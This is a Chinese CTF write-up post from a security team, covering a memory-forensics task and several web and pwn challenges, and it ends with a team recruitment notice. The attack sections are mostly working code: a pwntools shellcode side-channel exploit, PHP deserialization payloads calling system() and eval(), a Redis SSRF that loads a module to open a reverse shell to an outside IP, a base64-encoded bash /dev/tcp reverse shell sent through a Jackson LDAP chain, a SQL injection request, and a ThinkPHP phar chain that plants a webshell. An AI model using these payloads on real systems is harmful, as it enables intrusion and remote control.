点击蓝字 · 关注我们
签到
群公告
flag{e7gRR32wJJcHwQjwc2k9qFZ6fvn3gZ8P}
Browser
默认浏览器(请给出在注册表中可证明它是默认浏览器的对应的值,如:IE.HTTP) 一般都在注册表,耐心翻翻
./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist -o 0x8f484880
http://www.360doc.com/content/14/0216/23/13813789_353089973.shtml
"SoftwareMicrosoftwindowsShellAssociationsUrlAssociationshttpUserchoice"
版本 :92.0.902.78
还缺个url那个东西在本地的Edge的缓存里面可以找到一共叫History的SQLite format 3的文件,检索下 然后dump下来
./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 dumpfiles -Q0x000000007da2abf0 -D ./
https://weibo.com/login.phpMSEdgeHTM_92.0.902.78_https://weibo.com/login.phpezshell
from pwn import *elf=ELF('./chall')EXCV = context.binary = './chall'context.arch='amd64'def pwn(p, idx, c):# openshellcode = '''push 0x3a; pop rdi; xor rbx,rbx;inc bl;shl rbx,0x10;add rdi,rbx; xoresi, esi;open:push 2; pop rax; syscall;cmp al,0x4jl open'''# re open, rax => 0x14# read(rax, 0x10050, 0x50)shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x50;pop rsi;add rsi,rbx; syscall;"# cmp and jzif idx == 0:shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(idx,c)else:shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(idx,c)shellcode = asm(shellcode)p.recvuntil('======== Input your secret code ========n')p.send(shellcode.ljust(0x40-6, b'a') + b'./flag')idx = 0var_list = []while(1):for c in range(32, 127):p = remote("47.104.169.149",25178)# p=process('./chall')pwn(p, idx, c)start = time.time()try:p.recv(timeout=2)except:passend = time.time()p.close()if end-start > 1.5:var_list.append(c)print("".join([chr(i) for i in var_list]))breakelse:print("".join([chr(i) for i in var_list]))breakidx = idx + 1print("".join([chr(i) for i in var_list]))
easy_eval
反序列化
<?phpclass a{public $code = "system('cat /*;id');";function __construct($code){$this->code = $code;}}class b{function __construct($code){$this->a = new a($code);}function __destruct(){echo $this->a->a();}}$c = new b('eval($_REQUEST[0]);');echo serialize($c);
把redis的so扩展上传到/tmp目录下 用fsockopen发起ssrf 打redis
<?phpfunction Getfile($host, $port, $link){$fp = fsockopen($host, intval($port), $errno, $errstr, 30);if(!$fp){echo "$errstr (error number $errno) n";}else{$out = "$link";//$out = "GET $link HTTP/1.1rn";//$out .= "HOST $host rn";//$out .= "Connection: Closernrn";//$out .= "rn";fwrite($fp, $out);$content = '';while(!feof($fp)){$contents .= fgets($fp, 1024);}fclose($fp);return $contents;}}$poc = "AUTH you_cannot_guess_itrn";$poc .= "module load /tmp/exp.sornsystem.rev 121.196.165.115 6663rn";$poc .= "infornquitrn";var_dump($poc);var_dump(Getfile("127.0.0.1","6379",$poc));
jackson
花生壳设置内网穿透安排恶意ldap服务
use exploit LDAPLocalChainListeneruse payload CommonsCollections8use bullet TransformerBulletset lport 9001set version 3set args 'set args 'bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzIuMjAxLjQ0Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}''run
eztp
POST /public/ HTTP/1.1Host: 8.134.37.86:26846User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0)Gecko/20100101 Firefox/92.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 100Origin: http://8.134.37.86:26846Connection: closeReferer: http://8.134.37.86:26846/public/index.phpCookie: PHPSESSID=7la556p4v160a8j1nhcholth1dusername[0]=not like&username[1][0]=%%&username[1][1]=233&username[2]=)union select 1,1#&password=1
namespace think {abstract class Model{protected $append;protected $error;public $parent;}}namespace thinkmodel {use thinkdbQuery;use thinkModel;use thinkmodelrelationHasOne;use thinkconsoleOutput;abstract class Relation{protected $query;protected $selfRelation;protected $parent;protected $foreignKey;protected $localKey;}class Pivot extends Model{public function __construct(){$this->append = ['mb' => 'getError'];$this->error = new HasOne();$this->parent = new Output();}}}namespace thinksessiondriver {use thinkcachedriverFile;class Memcached{protected $handler;public function __construct(){$this->handler = new File();}}}namespace thinkcachedriver {class File{protected $options;protected $tag;function __construct(){$this->options = ['expire' => 3600,'cache_subdir' => false,'prefix' => '','path' => 'php://filter/convert.iconv.utf-8.utf7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../../../../../../../../var/www/html/public/uploads/a.php','data_compress' => false,];$this->tag = 1;}}}namespace thinkdb {use thinkconsoleOutput;class Query{protected $model;public function __construct(){$this->model = new Output();}}}namespace thinkconsole {use thinksessiondriverMemcached;class Output{protected $styles;private $handle;public function __construct(){$this->styles = ['where'];$this->handle = new Memcached();}}}namespace thinkmodelrelation {use thinkModelRelation;use thinkdbQuery;use thinkconsoleOutput;abstract class OneToOne extends Relation{protected $bindAttr;}class HasOne extends OneToOne{public function __construct(){$this->selfRelation = 0;$this->query = new Output();$this->bindAttr = ['ccc', 'ccc'];$this->foreignKey = 'ccc';$o = new stdClass();$o->mb = 'ccc';$this->parent = $o;$this->localKey = 'mb';}}}namespace thinkprocesspipes {use thinkmodelPivot;class Windows{private $files;public function __construct(){$this->files = [new Pivot()];}}}namespace {use thinkprocesspipesWindows;// echo urlencode(base64_encode(serialize(new Windows())));$phar = new Phar("exp.phar"); //后缀名必须为 phar$phar->startBuffering();$phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');$object = new Windows();$phar->setMetadata($object); //将自定义的 meta-data 存入 manifest$phar->addFromString("1.php", ""); //添加要压缩的文件//签名自动计算$phar->stopBuffering();rename("exp.phar", "exp.jpg");}
http://8.134.37.86:24954/public/? s=admin/index/listpic&dir=phar:///var/www/html/public/static/img/person.jpg
你是否想要加入一个安全团
拥有更好的学习氛围?
那就加入EDI安全,这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。
欢迎各位大佬小白入驻,大家一起打CTF,一起进步。
我们在挖掘,不让你埋没!
你的加入可以给我们带来新的活力,我们同样也可以赠你无限的发展空间。
有意向的师傅请联系邮箱[email protected](带上自己的简历,简历内容包括自己的学习方向,学习经历等)
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
相关推荐: 关于成立城市轨道交通信息安全专项工作n总体协调组和专家组的通知
城市轨道交通信息安全专项工作各有关单位:根据中国城市轨道交通协会工作安排,信息化专委会牵头开展城市轨道交通信息安全专项工作,围绕信息安全基础技术研究、标准体系建设、产品检测和认证、建立常态化安全服务机制、网络与信息安全培训五大方面开展,以提升行业整体信息安全防…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论